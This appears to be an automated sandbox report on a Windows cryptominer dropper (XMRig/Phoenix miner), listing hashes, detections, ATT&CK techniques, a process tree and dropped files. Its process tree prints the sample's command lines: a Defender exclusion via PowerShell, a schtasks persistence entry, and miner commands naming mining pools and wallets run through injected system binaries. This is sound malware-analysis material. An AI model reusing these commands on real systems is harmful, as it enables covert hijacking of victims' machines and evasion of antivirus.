xmrig | 776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b

Analysis

max time kernel
85s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
30-09-2022 20:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe
Size

802KB
MD5

dfa611cd9978c8099282d698d8ed4dc7
SHA1

0aa3b51130d24e43ff7b6146c02bc517f78da12d
SHA256

776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b
SHA512

93284d4b7d4bdeba22404d2521bb94f446f5838e8bc1cda34dfdb838dadefaab9dc0f32ee9235571c02572dec4f56869f1a11851d3fd3f4fd510fb0c7f1ff30f
SSDEEP

24576:82G/nvxW3WdmsuTwueIzi6c4zjJwBnyW2ZCh5XXAhx:8bA3lsu0ueLgz6QW8Cyx

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detectes Phoenix Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2984-173-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/2984-174-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3384-160-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3384-161-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/3384-162-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3384-163-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3384-166-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3384-175-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 3 IoCs

Processes:

work.exekesfg.exeULK.exe

pid process

2084 work.exe
4796 kesfg.exe
4048 ULK.exe

pid	process
2084	work.exe
4796	kesfg.exe
4048	ULK.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2984-168-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2984-170-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2984-171-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2984-173-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2984-174-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exework.exeULK.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	work.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	ULK.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

RegSvcs.exe

pid process

2984 RegSvcs.exe
2984 RegSvcs.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

ULK.exe

description pid process target process

PID 4048 set thread context of 3384 4048 ULK.exe vbc.exe
PID 4048 set thread context of 2984 4048 ULK.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4152 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4588 timeout.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exeULK.exe

pid process

4232 powershell.exe
4232 powershell.exe
4880 powershell.exe
4880 powershell.exe
4048 ULK.exe
4048 ULK.exe
4048 ULK.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
2984	RegSvcs.exe
2984	RegSvcs.exe

description	pid	process	target process
PID 4048 set thread context of 3384	4048	ULK.exe	vbc.exe
PID 4048 set thread context of 2984	4048	ULK.exe	RegSvcs.exe

pid	process
4152	schtasks.exe

pid	process
4588	timeout.exe

pid	process
4232	powershell.exe
4232	powershell.exe
4880	powershell.exe
4880	powershell.exe
4048	ULK.exe
4048	ULK.exe
4048	ULK.exe

pid	process
656

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

kesfg.exepowershell.exeULK.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	4796	kesfg.exe
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeDebugPrivilege	4048	ULK.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeLockMemoryPrivilege	3384	vbc.exe
Token: SeLockMemoryPrivilege	3384	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

3384 vbc.exe

pid	process
3384	vbc.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.execmd.exework.exekesfg.execmd.exeULK.execmd.exe

description	pid	process	target process
PID 4220 wrote to memory of 4388	4220	776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe	cmd.exe
PID 4220 wrote to memory of 4388	4220	776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe	cmd.exe
PID 4220 wrote to memory of 4388	4220	776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe	cmd.exe
PID 4388 wrote to memory of 2084	4388	cmd.exe	work.exe
PID 4388 wrote to memory of 2084	4388	cmd.exe	work.exe
PID 4388 wrote to memory of 2084	4388	cmd.exe	work.exe
PID 2084 wrote to memory of 4796	2084	work.exe	kesfg.exe
PID 2084 wrote to memory of 4796	2084	work.exe	kesfg.exe
PID 4796 wrote to memory of 4232	4796	kesfg.exe	powershell.exe
PID 4796 wrote to memory of 4232	4796	kesfg.exe	powershell.exe
PID 4796 wrote to memory of 4224	4796	kesfg.exe	cmd.exe
PID 4796 wrote to memory of 4224	4796	kesfg.exe	cmd.exe
PID 4224 wrote to memory of 4588	4224	cmd.exe	timeout.exe
PID 4224 wrote to memory of 4588	4224	cmd.exe	timeout.exe
PID 4224 wrote to memory of 4048	4224	cmd.exe	ULK.exe
PID 4224 wrote to memory of 4048	4224	cmd.exe	ULK.exe
PID 4048 wrote to memory of 4880	4048	ULK.exe	powershell.exe
PID 4048 wrote to memory of 4880	4048	ULK.exe	powershell.exe
PID 4048 wrote to memory of 3696	4048	ULK.exe	cmd.exe
PID 4048 wrote to memory of 3696	4048	ULK.exe	cmd.exe
PID 3696 wrote to memory of 4152	3696	cmd.exe	schtasks.exe
PID 3696 wrote to memory of 4152	3696	cmd.exe	schtasks.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 3384	4048	ULK.exe	vbc.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe
PID 4048 wrote to memory of 2984	4048	ULK.exe	RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe
"C:\Users\Admin\AppData\Local\Temp\776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
work.exe -priverdD
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2084

C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC132.tmp.bat""
5⤵
- Suspicious use of WriteProcessMemory
PID:4224

C:\Windows\system32\timeout.exe
timeout 3
6⤵
- Delays execution with timeout.exe
PID:4588

C:\ProgramData\updateWindows\ULK.exe
"C:\ProgramData\updateWindows\ULK.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
8⤵
- Creates scheduled task(s)
PID:4152

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 42T9sTTMxUFKM5dzD4Abv21q91YTVw3icZc6NkWGa2psJd8MCPtzXjtWNpjcTYtN9Ri83rPq7dGKBjhn3pyH5vGGG9d5FC7 -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl
7⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3384

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xAA676adD882a7792EE0d7f3bBf25c045292b5d8e.Rig001 -coin etc -log 0
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2984

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\updateWindows\ULK.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
C:\ProgramData\updateWindows\ULK.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
Filesize
35B

MD5
ff59d999beb970447667695ce3273f75

SHA1
316fa09f467ba90ac34a054daf2e92e6e2854ff8

SHA256
065d2b17ad499587dc9de7ee9ecda4938b45da1df388bc72e6627dff220f64d2

SHA512
d5ac72cb065a3cd3cb118a69a2f356314eeed24dcb4880751e1a3683895e66cedc62607967e29f77a0c27adf1c9fe0efd86e804f693f0a63a5b51b0bf0056b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
Filesize
638KB

MD5
cd6171e97790b70941139bd0dde07770

SHA1
076567a9e68ad9cf615b212866b669585d86f5b8

SHA256
04c41c882234712a40150b3bff8b3ec0e0547ba0be375bd4f74cd30ce97d48b6

SHA512
1e4dc83896d7463adbee84c3de1f6763773ec8bea70a70f593502fbb56f5b0f2403ade7964be67eea0de4fd8ff53dacea0d58813bc6a8110f880ceae122aa390

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
Filesize
638KB

MD5
cd6171e97790b70941139bd0dde07770

SHA1
076567a9e68ad9cf615b212866b669585d86f5b8

SHA256
04c41c882234712a40150b3bff8b3ec0e0547ba0be375bd4f74cd30ce97d48b6

SHA512
1e4dc83896d7463adbee84c3de1f6763773ec8bea70a70f593502fbb56f5b0f2403ade7964be67eea0de4fd8ff53dacea0d58813bc6a8110f880ceae122aa390

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC132.tmp.bat
Filesize
145B

MD5
af9a10b8cfa2f90d912155599ca863d4

SHA1
556e397851495dd284aaae5525f146c3338dac96

SHA256
e2fd15b9b3621873e77b8b565a830a5d97f066437a322a05032dd11d844fb89c

SHA512
37b03f3de09d17778af4ec104e0fd7d6645ce9a850e892f845d7b14bd5f8f8897b8e6c3cb3c7da2db04184bbed7007a61aa19bed2137624102441503278eb5c2

Download Submit
memory/2084-134-0x0000000000000000-mapping.dmp

Download
memory/2984-174-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2984-173-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2984-171-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2984-170-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2984-169-0x0000000140829C40-mapping.dmp

Download
memory/2984-168-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/3384-166-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3384-167-0x0000021EED7A0000-0x0000021EED7E0000-memory.dmp

Filesize
256KB

Download
memory/3384-175-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3384-176-0x0000021EED7E0000-0x0000021EED800000-memory.dmp

Filesize
128KB

Download
memory/3384-164-0x0000021EED750000-0x0000021EED770000-memory.dmp

Filesize
128KB

Download
memory/3384-177-0x0000021EED7E0000-0x0000021EED800000-memory.dmp

Filesize
128KB

Download
memory/3384-163-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3384-160-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3384-162-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3384-161-0x0000000140343234-mapping.dmp

Download
memory/3696-155-0x0000000000000000-mapping.dmp

Download
memory/4048-165-0x00007FFC45E60000-0x00007FFC46921000-memory.dmp

Filesize
10.8MB

Download
memory/4048-156-0x00007FFC45E60000-0x00007FFC46921000-memory.dmp

Filesize
10.8MB

Download
memory/4048-150-0x0000000000000000-mapping.dmp

Download
memory/4048-172-0x00007FFC45E60000-0x00007FFC46921000-memory.dmp

Filesize
10.8MB

Download
memory/4152-158-0x0000000000000000-mapping.dmp

Download
memory/4224-143-0x0000000000000000-mapping.dmp

Download
memory/4232-144-0x0000029CBB910000-0x0000029CBB932000-memory.dmp

Filesize
136KB

Download
memory/4232-142-0x0000000000000000-mapping.dmp

Download
memory/4232-149-0x00007FFC46EE0000-0x00007FFC479A1000-memory.dmp

Filesize
10.8MB

Download
memory/4232-148-0x00007FFC46EE0000-0x00007FFC479A1000-memory.dmp

Filesize
10.8MB

Download
memory/4388-132-0x0000000000000000-mapping.dmp

Download
memory/4588-147-0x0000000000000000-mapping.dmp

Download
memory/4796-145-0x00007FFC46EE0000-0x00007FFC479A1000-memory.dmp

Filesize
10.8MB

Download
memory/4796-141-0x00007FFC46EE0000-0x00007FFC479A1000-memory.dmp

Filesize
10.8MB

Download
memory/4796-140-0x00000000003C0000-0x0000000000498000-memory.dmp

Filesize
864KB

Download
memory/4796-137-0x0000000000000000-mapping.dmp

Download
memory/4880-159-0x00007FFC45E60000-0x00007FFC46921000-memory.dmp

Filesize
10.8MB

Download
memory/4880-153-0x0000000000000000-mapping.dmp

Download